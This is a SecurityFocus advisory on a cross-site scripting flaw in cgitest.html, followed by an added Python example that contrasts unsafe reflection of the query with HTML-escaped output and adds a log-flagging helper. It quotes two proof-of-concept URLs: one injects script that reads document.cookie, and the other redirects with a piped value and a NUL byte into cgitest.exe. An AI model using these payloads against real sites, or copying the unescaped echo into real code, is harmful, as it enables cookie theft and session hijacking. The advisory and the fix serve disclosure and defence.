source: https://www.securityfocus.com/bid/8242/info

cgitest.html has been reported prone to cross-site scripting attacks. The issue occurs due to a lack of sufficient sanitization performed on data supplied to the cgitest.html script.

This issue could be exploited to cause hostile HTML and script code to be rendered in the browser of a user who is enticed to visit a malicious link to the vulnerable script.

http://www.example.com/cgitest.html?<script>wi ndow.location="/cgi-bin/cgitest.exe?|<blahblah>%00";</script>

http://www.example.com/cgitest.html?<script>(document.cookie)</script>
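
The missing sanitization described above, shown beside its fix, as an added example that is not part of the advisory or the vendor's code. The advisory does not say how cgitest.html reflects its input, so `render_unsafe` is a hypothetical stand-in for that behaviour, and all function names are assumptions.

```python
import html
from urllib.parse import urlsplit, unquote

# The two request URLs quoted in the advisory, used here only as test input.
SAMPLES = [
    'http://www.example.com/cgitest.html?<script>wi ndow.location='
    '"/cgi-bin/cgitest.exe?|<blahblah>%00";</script>',
    "http://www.example.com/cgitest.html?<script>(document.cookie)</script>",
]


def raw_query(url):
    """Return the percent-decoded query string, as a handler would see it."""
    return unquote(urlsplit(url).query)


def render_unsafe(url):
    """Hypothetical stand-in for the reported flaw: input echoed verbatim."""
    return "<p>Query: " + raw_query(url) + "</p>"


def render_safe(url):
    """Drop control characters (e.g. the decoded %00), then HTML-encode."""
    cleaned = "".join(ch for ch in raw_query(url) if ch.isprintable())
    return "<p>Query: " + html.escape(cleaned, quote=True) + "</p>"


def looks_like_markup(url):
    """Log-review helper: flag decoded queries carrying HTML metacharacters
    or a NUL byte, which a plain parameter string should not contain."""
    query = raw_query(url)
    return any(ch in query for ch in "<>\"'\x00")


if __name__ == "__main__":
    for sample in SAMPLES:
        print("unsafe:", repr(render_unsafe(sample)))
        print("safe:  ", repr(render_safe(sample)))
        print("flag:  ", looks_like_markup(sample))
```

Encoding at output time is the actual fix; `looks_like_markup` is only a review aid for access logs and should not be relied on as a filter.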